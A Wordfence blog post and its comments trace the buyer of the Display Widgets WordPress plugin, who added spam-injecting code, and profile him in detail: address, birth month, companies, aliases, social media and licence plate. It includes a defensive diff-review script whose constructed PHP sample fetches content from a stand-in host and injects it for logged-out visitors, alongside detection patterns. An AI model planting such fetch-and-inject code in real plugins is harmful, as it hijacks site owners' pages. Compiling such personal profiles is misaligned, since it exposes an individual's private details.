
The Man Behind Plugin Spam: Mason Soiza

This entry was posted in General Security, WordPress Security on September 13, 2017 by Mark Maunder   161 Replies

This post is part of a series. This is the second post and a follow-up to our first story titled “Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites“. There is a third post in this series which explains how the same spammer influenced a total of 9 WordPress plugins over a 4.5 year period.

In this post, we explore who is behind the purchase and corruption of the Display Widgets plugin and at least two other popular WordPress plugins.

As part of my research into the sale of the Display Widgets plugin and the subsequent spam that appeared in it, I had reached out to Stephanie Wells, the original author of Display Widgets who sold it. Stephanie got back to me moments after I hit the publish button on our post.

We had a chat on Skype and she was incredibly concerned, helpful and forthcoming with data to try and clear up what exactly happened here. Steph has kindly agreed to let me share the details of their transaction with the WordPress community.

I was really excited because this allowed us to follow the money in our investigation into who is behind the spam in Display Widgets. Little did I know that this would lead to two other plugins and shed light on a story we wrote about last year.

Following The Money

Steph confirmed that they had sold the Display Widgets plugin to “Mason Soiza” for $15,000. He had approached them via their web contact form. This is the original email they received, complete with spelling errors:

–Begin email–

We would like to purchase this plugin from you and take complete owner ship of it and take away the stress from you.

We are trying to build one of the largest wordpress plugin companies and in doing this we are trying to purchase some rather large plugins like yours.

I am wondering if me and my team would be able to purchase this plugin from you and then take over the complete development of it and push out a new update to make it work better with the latest wordpress.

We will also put our admin team onto the support forum and make sure the users are happy and if there are any features they are specifically asking for we will get them added in to the next update.

We have over 34 Plugins that we now own and manage.

–End email–

During their negotiations they received a further email from Soiza on April 24th which read:

–Begin email–

We have 1 plugin per account as WordPress do not really like the fact that people sell or buy the plugins so this protects us as the buyer from one of the previous owners from “snitching” and then crashing all our other plugins.

I can name drop a few however:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.
https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

We have many others but these are most recent.

To be brutally honest,

It helps with our web business that is pretty big in the casino industry, when we can use as a sales tactic “Our code is used on over 30million websites” world wide etc etc. Sounds silly but it goes along way in our industry, especially as we need to evident our statements by law.

–End email–

Note the “404 to 301” plugin in that list. We’ll come back to that.

The plugin was no longer a core part of Steph and her husband’s business, so they decided to sell it.

The PayPal transaction from May 19th, 2017 to purchase Display Widgets reads: Mason Soiza (pp@linkrocket.net) made a $15,000.00 USD payment

The contract that Steph received is signed by Mason Soiza.

On June 21st, the first release of Display Widgets under the new author went out. Then on June 30th there was a second release, version 2.6.1, which included the malicious code we covered in part 1 of this series of posts. To remind you, this code allowed the new plugin author – Soiza, in this case – to publish spam content on any site running Display Widgets. There were approximately 200,000 sites using Display Widgets at the time.

The Trac ticket that Calvin Ngan opened 7 weeks ago, which was the first report of the malicious code and activity in Display Widgets, reported Payday Loan spam. This is an important fact, as you’ll see below.

Who Is Mason Soiza?

The contract that Stephanie received is signed by Mason Soiza. The company name used on the contract is:

Soiza Limited of Jubilee Cottage, Nottingham, England, NG122LD.

Companies House in the UK shows Soiza Limited as:

The address is a complete match to the address and company name provided on the invoice. The company has one corporate officer, Mason Reece Soiza, born March 1994 (age 23), a British citizen, appointed to the board on December 6th, 2016. His occupation is listed as Computer Programmer.

The email that Soiza used in the transaction is pp@linkrocket.net. If we visit the site linkrocket.net, it doesn’t provide much other than a logo. However, if we look at an archived version of it from May 2014, three emails appear on the home page, and we get Mason Soiza’s real email address, which is mason@linkrocket.net.

Using an email search engine called Pipl, we searched for mason@linkrocket.net and found a long list of social profiles.

Included is a LinkedIn profile for Mason Soiza in Nottingham. The profile pic has now been removed from his LinkedIn profile page but this is a screen capture.

Soiza’s LinkedIn profile lists him as CEO of “Payday Loans Now” since 2014.

If we visit www.paydayloansnow.co.uk, we discover at the top left of the page the following:

The footer of the page looks like this:

The pertinent data in this footer is:

  • Paydayloansnow.co.uk is confirmed to belong to Soiza Internet Marketers Limited (SIML).
  • SIML is an “introducer appointed representative” of Quint Group Limited.
  • SIML is entered on the Financial Services Register in the UK under reference number 748266
  • Quint Group Limited is entered on the Financial Services Register under reference number 669450
  • SIML’s company number is 09861376

Let’s go to the Financial Services Register and look up SIML’s reference number. We find it listed as follows.

And on the FCA register we find the email address mason@inkrocket.net. This may be a typo, because the domain ‘inkrocket.net’ doesn’t actually exist. The actual domain should probably be (l)inkrocket.net.

Who Does Soiza Represent?

Based on data from the UK’s Financial Conduct Authority, “Soiza Internet Marketers Limited” is authorized to introduce clients to Quint Group Limited. Quint provides the financial services that Soiza is selling.

Soiza also operates www.unsecuredloans4u.co.uk which is also reselling Quint’s financial products.

I phoned Quint in the UK and was escalated to their compliance director, Graham McGifford, who was very responsive. He told me that Quint does have standards they require their representatives to adhere to and they will take action if needed.

Quint confirmed that Mason Soiza is an authorized representative, or ‘introducer,’ as the FCA’s website calls it.

Graham requested that I send him more information so that they can look into the matter. We will be forwarding this blog post.

Linking Mason Soiza to the 404 to 301 Plugin Spam

You will recall that in Soiza’s own email to Steph (above) which he sent in April of this year while negotiating the purchase of the Display Widgets plugin, he mentioned that he bought the 404 to 301 plugin:

https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

In August of 2016, we wrote a story titled “404 to 301 Plugin Considered Harmful“. This was a controversial piece and we posted a follow-up titled “We will always put our customers and community first“.

In the follow-up, we mention that the spam from the 404 to 301 plugin was appearing on school websites in the UK and in particular, a UK based “escort” service called cityofescorts.co.uk had appeared on a school website. This is the code that was fetching the spam content for the 404 to 301 plugin:

And this is an obfuscated screenshot we included in our August 2016 post:

If you do a whois lookup on cityofescorts.co.uk, you discover that the owner is Mason Soiza.

The wpcdn.io server that was being used to serve spam to the “404 to 301” plugin is still up and running today. And if you visit the URL at wpcdn.io that was being used to serve up spam today, it serves up paydayloansnow.co.uk, which we have shown is another Soiza website.
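The pattern described in this post, a plugin changing hands and its next release (Display Widgets 2.6.1 above) quietly adding code that pulls content from a server the new owner controls and injects it into the site, is something a site owner or repository reviewer can catch by diffing the previous release against the new one before deploying it. The Python script below is an added example, not code from the original post, from Wordfence, or from either plugin: it diffs two constructed PHP snippets that stand in for an old and a new release and flags added lines that match a few generic indicators (a hard-coded remote fetch, runtime code decoding, hooking rendered content or creating posts, and behaviour gated on the visitor being logged out so administrators never see it). The plugin snippets, the hostname cdn.example-spam.test and the function names are all made up for illustration; the heuristics are general review checks, not a signature of the actual malicious code.

```python
import difflib
import re

# Constructed stand-ins for an "old" and "new" plugin release. This is not
# Display Widgets or 404 to 301 code; cdn.example-spam.test is a made-up host.
OLD_RELEASE = """<?php
/* Plugin Name: Example Widgets (constructed sample) */
function exw_register() {
    register_widget('EXW_Widget');
}
add_action('widgets_init', 'exw_register');
"""

NEW_RELEASE = OLD_RELEASE + """
function exw_fetch_remote() {
    $r = wp_remote_get('http://cdn.example-spam.test/c.php?h=' . $_SERVER['HTTP_HOST']);
    if (!is_user_logged_in() && !is_wp_error($r)) {
        return wp_remote_retrieve_body($r);
    }
    return '';
}
add_filter('the_content', function ($c) { return $c . exw_fetch_remote(); });
"""

# Generic indicators that deserve a human look when they show up in lines
# ADDED by an update. They are review heuristics, not malware signatures.
PATTERNS = {
    # HTTP fetch of a hard-coded URL from inside the plugin
    "remote_fetch": re.compile(
        r"\b(wp_remote_get|wp_remote_post|wp_remote_request|file_get_contents|"
        r"curl_init|fsockopen)\s*\(\s*['\"]https?://"),
    # code decoded or built at runtime
    "dynamic_code": re.compile(
        r"\b(eval|create_function|base64_decode|gzinflate|str_rot13)\s*\("),
    # creating posts or hooking into rendered page content
    "content_injection": re.compile(
        r"\b(wp_insert_post|wp_update_post)\s*\(|"
        r"add_filter\s*\(\s*['\"](the_content|the_posts|posts_results|wp_head)['\"]"),
    # output that only logged-out visitors get (site admins never see it)
    "logged_out_gate": re.compile(r"!\s*is_user_logged_in\s*\("),
}

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def added_lines(old_src, new_src):
    """Yield lines present in new_src but not in old_src ('+' lines of a unified diff)."""
    diff = difflib.unified_diff(old_src.splitlines(), new_src.splitlines(),
                                lineterm="", n=0)
    for line in diff:
        if line.startswith("+") and not line.startswith("+++"):
            yield line[1:]


def review_update(old_src, new_src, trusted_hosts=("wordpress.org",)):
    """Return a list of {category, detail} findings for suspicious added lines.

    Any URL whose host is not in trusted_hosts (or a subdomain of one) is
    reported separately as external_host, since a plugin that phones home to a
    host the author controls is the core of the abuse described in the post.
    """
    findings = []
    for code in added_lines(old_src, new_src):
        for category, pattern in PATTERNS.items():
            if pattern.search(code):
                findings.append({"category": category, "detail": code.strip()})
        for host in HOST_RE.findall(code):
            if not any(host == t or host.endswith("." + t) for t in trusted_hosts):
                findings.append({"category": "external_host", "detail": host})
    return findings


if __name__ == "__main__":
    for finding in review_update(OLD_RELEASE, NEW_RELEASE):
        print(f"{finding['category']:18} {finding['detail']}")
```

Run against the constructed sample this reports the hard-coded fetch, the untrusted host, the logged-out gate and the `the_content` hook, and reports nothing when a release is diffed against itself. In practice you would feed it the two plugin ZIPs from the wordpress.org repository (or two tags from the plugin’s SVN) rather than inline strings; a finding is a prompt to read the code, not proof of malice, since legitimate plugins also call `wp_remote_get`.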

Soiza says he bought 404 to 301. I reached out to the original plugin author, Joel James, to see if that is true. I haven’t been able to contact him.

Back in August of last year, Joel James wrote on this blog:

Did Joel James give Soiza commit access to his code? I would really like to hear more about what exactly happened. Soiza is now saying he purchased the plugin, but we don’t know if that was before or after the 404 to 301 debacle unfolded. Joel if you could comment here to help us understand the timeline, that would be really helpful.

What About the Other Plugins Soiza Bought?

In his email to Steph, Soiza mentions two other plugins. The notes to the right of each arrow are his:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.

I have not been able to connect with the author of ‘WP Slimstat’.

I did manage to connect with Ciprian Popescu, author of the “Finance Calculator” plugin that Soiza says he purchased, and Ciprian was kind enough to share the details with me.

Soiza contacted Ciprian early this year and used an alias of “Kevin Danna”. He expressed interest in buying Finance Calculator.

Soiza then purchased Finance Calculator for $600. During his communication with Ciprian, Mason Soiza appeared to make an error and he accidentally signed one of his emails from the Kevin Danna alias as ‘Mason’. Ciprian shared a screenshot with me:

Soiza also appears to use the Kevin Danna alias on WordPress forums.

Ciprian told me that for some reason, Soiza never updated the plugin after he purchased it. After learning about what happened with Display Widgets, he has taken back control of the Finance Calculator plugin, revoked Soiza’s access and confirmed that it is malware free. I received this message from him:

Hi Mark,

I can confirm that my plugin has not been tampered with. I have pushed an update to remove the ‘financecalculator’ committer, which was Mason Soiza. I am in the process of updating more stuff, such as rewriting some code for a smaller footprint; but the plugin is fully functional and malware-free.

My Communication With Soiza

We now have hard evidence, courtesy of Ciprian, that Soiza uses the “Kevin Danna” email address to communicate with people. We also know that the new owner of Display Widgets plugin was using that address on WordPress forums.

I communicated with “Kevin Danna” via email while researching our previous post. I asked about the “34 plugins” mentioned on the wpdevs.co.uk website that they owned. I also wanted to know if the malicious code in Display Widgets was there intentionally. This is the reply I received from “Kevin”. I published this in our previous post and left out the first few paragraphs. I’m including them this time to give you a sense of who this person is.

Hi Mark,

Just seen this email WOW!

My side of the story is, as you may/may not know, I got diagnosed with Lung Cancer a few months ago, so only have a few months/maybe a year left on this earth. So I sold up all my plugins to numerous people.

The Display Widgets plugin was sold to a company in California who made me sign an NDA. Probably due to the reasons you have highlighted. This is the only plugin I sold to this “guy”. He claims to have lots of “drupal” plugins and this was his first wordpress plugin. I bought this plugin for $15,000 and sold it for $20,000. They told me they were using it to advertise their toolbar, which I suppose you could use to search them up.

In regards to the 34 plugins and counting, that was at the peak of my career. I would buy plugins, brand them up towards say a “web design” business on the /wp-admin/ and then sell the web design business along with the plugin with words like “Used by over 100,000+ websites”. Adding words like that etc inflated the price of the business by xyz and then I would simply flip it as quick as I could. WP Devs is now a defunct company for obvious reasons.

I apologise for any inconvenience I have caused indirectly. I wish you the best of luck!

Thanks

Kevin D

We know that Soiza bought the Display Widgets plugin from Steph and bought Ciprian’s Finance Calculator plugin. We know that Soiza communicates using the Kevin Danna email address. We also know that Mason Soiza owns the domains used for spamming in the “404 to 301” plugin. We also know that Steph sold her plugin for $15,000 to Mason Soiza; the above email is actually the first time I had heard that number mentioned. We also know that the wpdevs.co.uk website was only registered in April, so it’s not an old business from the “peak” of someone’s career.

So I’m going to go out on a limb here and say that Kevin Danna is actually Mason Soiza and based on Soiza’s public Facebook Profile, he is looking quite healthy.

Other Interests

According to a Whoisology search using Soiza’s email address, he owns the following domains:

  • onlineblackjackexpert.net (Active blackjack site)
  • 0xd0d78w2.info (Listed with Google as serving up malware. See below)

Before Google blocked it, the 0xd0d78w2.info domain was serving up a site that claimed your computer was infected and tried to get you to call a “Microsoft” support line. It looked like this (courtesy of Archive.org):

Business Is Good

Soiza appears to live the high life. On his public Facebook profile, he posts that he attended the Monaco Grand Prix in May of this year.

In April he was at Dead Rabbit in New York ($16 a cocktail).

Last year someone with the name “Mason Reece Soiza” posted a photo of their 2012 Ferrari 458 Italia on rate-drive-co.uk. The thread was discussing an “idiot driver” driving a red Ferrari 458 Italia 2012 model. The license plate is “MA52 SON”.

Business appears to be booming for Soiza.

Wrapping It Up

Our team has assembled a lot of data on Mason Soiza from public sources. He has interests in a wide range of online businesses that include payday loans, gambling and ‘escort’ services, among others.

He has been active on black hat forums and has been banned from “Black Hat World” (username LinkRocket) and from WickedFire.com (username MasonSoiza). Soiza is active on Reddit as IIRR and moderates a subreddit called /r/paydayloansnowcouk.

At this point we have confirmed that Soiza purchased the Finance Calculator plugin and the Display Widgets plugin, and we have established a financial trail. He added a backdoor to the Display Widgets WordPress plugin to allow himself unlimited publishing access to sites running the plugin.

We also know that Soiza was involved in the spam that originated from the “404 to 301” plugin which he says he bought, although in that case the author has not yet confirmed the sale of the plugin. His escort website and payday loans websites were spammed from the “404 to 301” plugin.

If you are contacted by “Kevin Danna” or “Mason Soiza” and are a plugin author, we advise you to avoid all contact.

As always I welcome your feedback in the comments.

Thanks and Credits

A big thanks to Steph Wells, original author of the Display Widgets plugin, who provided the initial financial data we needed to follow the money. Also a huge thanks to Ciprian Popescu, author of the Finance Calculator plugin, who also shared transaction data with me and a screenshot that confirmed Soiza uses the Kevin Danna alias. Both plugin authors worked with me on very short notice, so thank you!!

Also a huge thanks to our team who dropped everything and worked to rapidly build up a profile of Soiza. I’ve mentioned their names on the blog before, but just about everyone pitched in on this post, so you can hit our About page to see who they are. Special thanks to Matt Barry who recognized the connection between Soiza and the “404 to 301” plugin during our research.


161 Comments on "The Man Behind Plugin Spam: Mason Soiza"

Katy Stevens September 13, 2017 at 10:58 am • Reply

You guys do better research than a woman who thinks her man is creeping around on her...! NICE work. Found this a thoroughly interesting read.

TBG Marketing September 13, 2017 at 11:01 am • Reply

Are you saying that wp-slimstat is compromised?

Mark Maunder September 13, 2017 at 11:28 am • Reply

I have no data on that at this time.

James September 13, 2017 at 2:08 pm • Reply

I pinged the developer Jason/Camu/coolmann on slack. I might have insight Mark. Can you email me?

Jeannie September 13, 2017 at 11:08 am • Reply

So does this mean that if we have the 'Display Widgets' plug-in, we are in threat of seeing spam if we upgrade the plug-in?

Thanks

Mark Maunder September 13, 2017 at 11:27 am • Reply

The new version is safe thanks to the plugin repository maintainers.

Geoff Jones September 13, 2017 at 11:09 am • Reply

Nice residence he has too.
[Link to residence removed by moderator]

Amy September 13, 2017 at 11:09 am • Reply

Very thorough write up—thank you. I suspect you will be contacted by more plug-in authors. I appreciate the "abandoned" and "removed" plug-in warnings you've added to WF, by the way.

Kristian September 13, 2017 at 11:11 am • Reply

You guys are fantastic!! Love your extra mile efforts on everything you do. The future is yours.

Vic Vinegar September 13, 2017 at 11:12 am • Reply

jj@linkrocket.net = Joel James?

Mark Maunder September 13, 2017 at 11:56 am • Reply

Just chatted to the team and two analysts involved in the research both have high confidence that is not Joel James.

Joel James September 14, 2017 at 11:59 pm • Reply

Hey Vic,

No. It's not me :)

Zubair Beg September 13, 2017 at 11:12 am • Reply

Wow.. You guys are really Sherlock!
So what can you do now? To stop this guy?

Jeff L. September 13, 2017 at 11:13 am • Reply

Nice work guys! I've been using your plugins since the day you released them, I'm a premium customer now, and I can't tell you how much your work means to the wordpress community - you've really skyrocketed your abilities over the past year or so and I recommend you to each and every person I know that works with wordpress.

Jeff

steelyhead September 13, 2017 at 11:17 am • Reply

This is like a thriller. Nice long read and totally worth your time. Am I on the wrong side of the law? I have webpages and my family has been living off what I made from my 9 local pages for many years, but I don't have a Ferrari and surely I cannot go to places that charge you $16 USD per cocktail. I am just wondering.

Jim D. September 13, 2017 at 11:17 am • Reply

Great detective work, and writing.
So, what are the ramifications/punishment for Mr. Soiza if any?

Gary September 13, 2017 at 11:18 am • Reply

Possibly the most interesting thing I've ever read. Nice job!

Gordon September 13, 2017 at 11:18 am • Reply

So tell me you've sent all this on to the appropriate law channels

eamel September 13, 2017 at 11:18 am • Reply

I feel sorry for Ciprian. He must be pissed he got rid of his Finance plugin for just 600 bucks whilst the Display Widgets plugin was sold for $15,000. Poor guy.

Ciprian Popescu September 14, 2017 at 2:55 am • Reply

I do not feel sorry. The plugin didn't have that many active installs at that time compared to Display Widgets.

Ian Goldey September 13, 2017 at 11:20 am • Reply

Great detective work I thoroughly appreciate the diligence in communication as it gives me a better sense of how you help protect end users like myself

Benjamin September 13, 2017 at 11:21 am • Reply

Wow nice work. U guys think he'll get busted for this stuff ?
I'm hoping for a nice little police raid on his companies

Kelly September 13, 2017 at 11:21 am • Reply

You guys are awesome! Thanks for looking out for our safety. I truly appreciate each member of your team for the work they do.

Mark Scott September 13, 2017 at 11:22 am • Reply

As Mason Soiza appears to be resident in and operating in the UK, you might want to contact the UK Police fraud action line with the results of your investigation:
http://www.actionfraud.police.uk/

Mark Maunder September 13, 2017 at 11:25 am • Reply

Thanks. We have not contacted law enforcement at this time. We have contacted the financial firm he represents and they have asked for more information.

Nicholas September 13, 2017 at 11:59 am • Reply

You should contact them, or at least someone should.

It also appears he runs an online pharmacy in the UK. I doubt that a person of his character should be issuing prescription drugs to sick people.

Katy September 13, 2017 at 11:04 pm • Reply

HMRC would probably be quite interested too! https://www.gov.uk/government/organisations/hm-revenue-customs/contact/customs-excise-and-vat-fraud-reporting

Stephen Edgar September 14, 2017 at 12:33 am • Reply

This should be reported (along with any unpublished information) to the "UK National Cyber Crime Unit" as noted by a David Sandilands below.

As noted at the end of your article "...our team who dropped everything and worked to rapidly build up a profile of Soiza.", I'd much rather have seen you take all the time you needed to work with the authorities to have “Mason Soiza” arrested and prosecuted for his actions rather than being "doxed" here in a blog post.

Once “Mason Soiza” was convicted, documenting that and then publishing that would make for a ripping post.

Instead, I'm disappointed and all I see is that “Mason Soiza” has been given a heads up to go and hide from the authorities for his crimes.

Mark Maunder September 14, 2017 at 8:16 am • Reply

I think we did a pretty good job of capturing the docs that would be needed to prosecute him. We have a lot that remains unpublished dating back to when he was a teenager. Should Scotland Yard reach out, we'd be happy to work with them.

Mark.

ChrisNJ September 13, 2017 at 11:22 am • Reply

Great work on exposing a scammer. He and other similar low-lifes will probably just learn to better cover their tracks in the future, but it is a great case study on what will likely become an increasing problem of shady operators acquiring or adopting legitimate and popular plugins and corrupting them to enable spamming and hacking of WordPress websites. Once again WordFence leads in the arena of cyber security.

Ko September 13, 2017 at 11:24 am • Reply

Quote: We have over 34 Plugins that we now own and manage.
Which ones?

Mark Maunder September 13, 2017 at 11:24 am • Reply

I think that is a false claim.

Rich S. September 13, 2017 at 11:25 am • Reply

Nice work, Mark and co.

Mason Soiza is like the villain from a white collar crime drama. Hopefully, your research will make potential victims aware.

Steve September 13, 2017 at 11:25 am • Reply

What an interesting read. You perform incredible research and it's much appreciated.

Mark Maunder September 13, 2017 at 11:27 am • Reply

Thank you. It's a team effort. Usually 5 to 10 people helping out with these posts whether it's research or editing.

Artem Russakovskii September 13, 2017 at 11:26 am • Reply

Nice detective work, Mark.

Mark Maunder September 13, 2017 at 11:26 am • Reply

Thanks.

Lawrence September 13, 2017 at 11:27 am • Reply

Mark, I am so impressed that you have exposed this guy. In a world where people tend to let bad things happen because they don't think it affects them you have become a champion. As has been said throughout history, the only thing necessary for the triumph of evil is that good men do nothing and you are absolutely doing something to protect us!
I have several websites all running the free version of Wordfence. I maintain these for people free of profit and so could not commit to a premium version. However, because I value everything you do I would be happy to make a donation if that is possible. Please let me know.

bruceb September 13, 2017 at 11:27 am • Reply

Awesome detective work guys! I love it. I would rather read these than the local news. :)

Keep up the great work, and thanks for caring so much about the WordPress community.

Doctor Popular September 13, 2017 at 11:32 am • Reply

This was a great read. Can't wait for the film adaptation. Who should play Mason? I could see James Franco pulling it off.

Tracy Abildskov September 13, 2017 at 11:33 am • Reply

WOW what a great article. Thank You. Special Thanks also to Steph Wells & Ciprian Popescu.

Tracy

Ciprian Popescu September 14, 2017 at 2:56 am • Reply

Thank you, Tracy!

Previsha September 13, 2017 at 11:34 am • Reply

Wow, this is impressive research. Thanks for making us aware of the person behind the spam. Spammers beware, Wordfence will find you.

Ken September 13, 2017 at 11:35 am • Reply

Fantastic detective work!!! I'm looking forward to your next takedown!

Simon Leek September 13, 2017 at 11:38 am • Reply

Great read. If Mason thinks he's innocent you should be getting a call from his lawyers sometime soon. But something tells me you won't be getting that call. Let us know if he doesn't get in touch because that will confirm his guilt.

John September 13, 2017 at 11:39 am • Reply

Wanting to be sure it is not the same slimstat plugin I've used on occasion in the past (its not), I went to the url for WP-Slimstat you give... The plugin was updated 17 hours ago, has 100,000+ active installs, a 4.8 review rating with 671 five stars, and 45 out of 45 resolved issues in last two months... The author seems to be unrelated to all of this...?

You don't mention this wp-slimstat but the one time I believe, as one purchased by Soiza...? Maybe some more needs to be said regarding this...? Distance all this from that plugin, if it is unrelated...?

Ovidiu September 13, 2017 at 11:41 am • Reply

Man, WHAT A STORY! I can't believe you really went that far to document this. You really did a great job! Also, this guy seems a bit too "exposed" for what he does, I mean, I would have expected that someone with this kind of "activity" to clean his footprints better, but as you point here, he's, well, almost everywhere with this name in clear. I guess it would come handy for the police :-)

Congratulations!

Paul September 13, 2017 at 11:42 am • Reply

We use SlimStat Analytics. Maybe you should contact the developer Jason Crouse and ask him if everything is ok. Mentioning his plugin and then not adequately checking if it has any relevance to this article is not a good idea.

Mark Maunder September 13, 2017 at 12:01 pm • Reply

I tried but had no luck. Couldn't find contact info anywhere.

Bjarne September 14, 2017 at 7:01 am • Reply

Jason, developer of Slimstat Analytics, says that the plugin never switched hands on https://wordpress.org/support/topic/issues-unrelated/#post-9496649

Also claims to be reaching out to WF without luck - sort of funny in a world more connected than ever ;)

Thank you all for your great work - using both WF and Slimstat on most of my sites :)

Mark Maunder September 14, 2017 at 8:10 am • Reply

He reached out a couple of hours ago. It's 8am here and I'm just starting my day. Have replied to him via email and to the comment here.

WOWW September 13, 2017 at 11:44 am • Reply

This is HUGE!
I was so concentrated and excited while reading this... same as if I was watching the best crime thriller movie :).
I remember as it was yesterday about "404 to 301 Plugin" and Joel James crying that he made a mistake... This isn't end.. soon I hope we will find the true story about "404 to 301 Plugin" and hopefully more plugins got bought by Mason.
Personal THANKS to plugin authors for the info provided.
GREAT job guys (and girls), waiting for more news!!!

Mark Maunder September 13, 2017 at 12:01 pm • Reply

Thanks. :-)

Adrian September 13, 2017 at 11:44 am • Reply

One thing not clear from this is whether the Display Widgets Plugin is now free of this code or not. I have it on one client's site and it was updated to revert to the previous version 2.05. I then got a notification to update to 2.7 but it will not update to this and when I look at "view details" I see the following error message :-

Warning: call_user_func_array() expects parameter 1 to be a valid callback, function 'dfcg_load_scripts_footer' not found or invalid function name in /home2/don/public_html/wp-includes/class-wp-hook.php on line 298 There is nothing wrong with the WP-Includes code and it does not happen when looking at any other plugin's "view details" so clearly there still appears to be something wrong with the latest update. The prior version 2.05 works.

Mark Maunder September 13, 2017 at 11:59 am • Reply

Hi. The plugin team took it over and it's clean now. Update here: https://wordpress.org/support/topic/display-widgets-2-7-is-safe/

look September 13, 2017 at 11:52 am • Reply

WOW! you are doing a great job! keep it going!

Ammar September 13, 2017 at 11:57 am • Reply

You should contact the police immediately, it's a cybercrime. Thank you so much for this valuable information.

Roger Maves September 13, 2017 at 11:58 am • Reply

So what is the best way to protect yourself from plugins like these? Is there a way to check them before installation?

Paul Brady September 13, 2017 at 12:07 pm • Reply

Very well done.

Mark Maunder September 13, 2017 at 12:07 pm • Reply

Wanted to include this here. We didn't include this fact in the post. Soiza targeting Drupal modules in 2014.

https://twitter.com/wordfence/status/908043683269709824

Lisa September 13, 2017 at 12:41 pm • Reply

That makes me wonder if he got his hooks into any Joomla extensions as well. Scary thought.

Jay September 13, 2017 at 12:12 pm • Reply

Keyser Soiza walking with a limp now :D Nice work.

Brom September 13, 2017 at 12:23 pm • Reply

What a great article.
Some of the most enjoyable reading I've had recently.

I scanned his Payday site for plugins and none were found. How did he cloak his plugins?

Brian September 13, 2017 at 12:26 pm • Reply

Don't forget to leave a Facebook message for him and his girl #twats.

Well done Mark for exposing this scammer living off the riches from SPAM.

David Perednia September 13, 2017 at 12:28 pm • Reply

Great sleuthing Mark. A real eye-opener to the underbelly of the cyber world.

Jack Smith September 13, 2017 at 12:31 pm • Reply

This is an outstanding job of sleuthing and informing the public. It does make me stop and wonder though. This process of purchasing a plugin and reworking it to include a backdoor is bothersome. It makes me wonder/be concerned about who is actually behind a 'useful' plugin and what their intentions are. Most people take a plugin generally for granted, and might potentially base their usage on the plugin based on reports from the web. If a party purchases a previously reliable plugin and secretly uses it to implant a bad door. They will pretty much keep this a secret (until they run into the Wordfence detectives! ). This nefarious usage could go on for a good while, until it is discovered, IF it is discovered. I see this as akin to the 'Trojan Horse' used ages ago. If they cannot batter the gates down, they let you opt to bring their weapon into your site, by your own accord.

Kevin Meredith September 13, 2017 at 12:33 pm • Reply

You should option this blog as a movie. Great stuff.

Paul Dahlen September 13, 2017 at 12:33 pm • Reply

Other WordPress 'news' sites can take lessons from this excellent writeup of information that is genuinely important for WordPress owners to know. This is the kind of investigative news I would pay a subscription price to read. There's quite a bit of investigating that needs to be done indeed! Lots of questions being asked that aren't being answered. Thank you for your piece. I'll bet you had fun following the clues! I know I had fun reading this. Thank you for helping our clients and us stay safe!

Jennifer L Metro September 13, 2017 at 12:34 pm • Reply

So lucky to have you guys on my side! Keep up the good work. I put you on every site I create.

John K September 13, 2017 at 12:42 pm • Reply

Wordfence is wonderful as-is, but I cannot thank you enough for exposing this cybercrook.

Alan September 13, 2017 at 12:43 pm • Reply

Thank you so much for this thorough piece of investigative journalism! We're living in times when a lot of articles online - even from mainstream news sites - don't follow the rules of journalism: fact-checking, following up with sources, asking for comments from those being written about, etc., so kudos on a job well done to expose the shoddy dealings of this person.

David Finch September 13, 2017 at 12:44 pm • Reply

I do believe this is the same guy who tried to create a company releasing all of WPMU Dev's Plugins for a lower one off price a few months back. He wasn't particularly subtle about it either.

Jessica September 13, 2017 at 1:03 pm • Reply

So is 404 to 301 still compromised?

Mark Maunder September 13, 2017 at 2:15 pm • Reply

Not that I'm aware of.

winston September 13, 2017 at 1:13 pm • Reply

Great work. But shouldn't this also be the job of the WordPress team? Keeping their plugins safe from harmful plugins? Any reactions from their side?

Donal September 13, 2017 at 1:23 pm • Reply

Great research and a very well done. You guys do such a good job keeping all our wp sites safe.

Erin September 13, 2017 at 1:39 pm • Reply

Wow! Amazing story! You guys are awesome, as always! I am so grateful for the work you do, and for going the extra mile in cybersecurity! I don't know of any company like yours who takes a genuine interest in protecting others or who goes to such extraordinary lengths to do such thorough investigations. You are earning ironclad trust with your customers!!! Thank you so very much for all that you do and keep up the EXCELLENT WORK! Truly jaw-dropping...

David Sandilands September 13, 2017 at 1:42 pm • Reply

This should definitely be reported to the UK National Cyber Crime Unit.

Furthermore, checkout

Mason Reece Soiza is director of 2 companies, RocketX Ltd (Advertising agencies) and TwoNerds Ltd (Publishing of computer games)

Sources :
https://beta.companieshouse.gov.uk/company/10905364/officers
https://beta.companieshouse.gov.uk/company/10823032/officers

There was a company called SOIZA STUDIOS LTD, which was dissolved this year
Source: https://beta.companieshouse.gov.uk/company/06941254

The website is/was soizastudios.com, which owns
onlinecasinoexperts.net and onlinerouletteexpert.net

Good Luck!

StanG September 13, 2017 at 1:44 pm • Reply

Very nice detective work!
Really interesting to read.

Joshua September 13, 2017 at 1:55 pm • Reply

Thank you so much for this. Your in-depth information is amazing!

Steven Wolock September 13, 2017 at 2:04 pm • Reply

Excellent digging and reporting! Thank you!

Sven Schneider September 13, 2017 at 2:34 pm • Reply

wow, best story ever! I really appreciate your efforts doxing that person. Hope he doesn't get away with this ...

H Per September 13, 2017 at 2:42 pm • Reply

Awesome! Thanks so much for this! Luck!

Steven September 13, 2017 at 2:45 pm • Reply

Thank you for this info, it is so deep and I never imagined this kind of thing happened. Anyway, Wordfence helps me to protect my website from hackers; I set up auto block for users who sign in using invalid usernames, and most of them are from Russia. I am still using the free version as I can't afford to upgrade.
Thank you.

Glenn Ferrell September 13, 2017 at 2:50 pm • Reply

Wow! If there were an annual "Cuckoo's Egg" award, I would hope you're up for it :) This trail seems to lead to someone UK authorities might like to meet.

Mark Maunder September 13, 2017 at 3:54 pm • Reply

Thanks Glenn!!

Elizabeth September 13, 2017 at 2:53 pm • Reply

Great job! When does the movie come out?

Mark Maunder September 13, 2017 at 3:53 pm • Reply

Haha. Thanks Elizabeth.

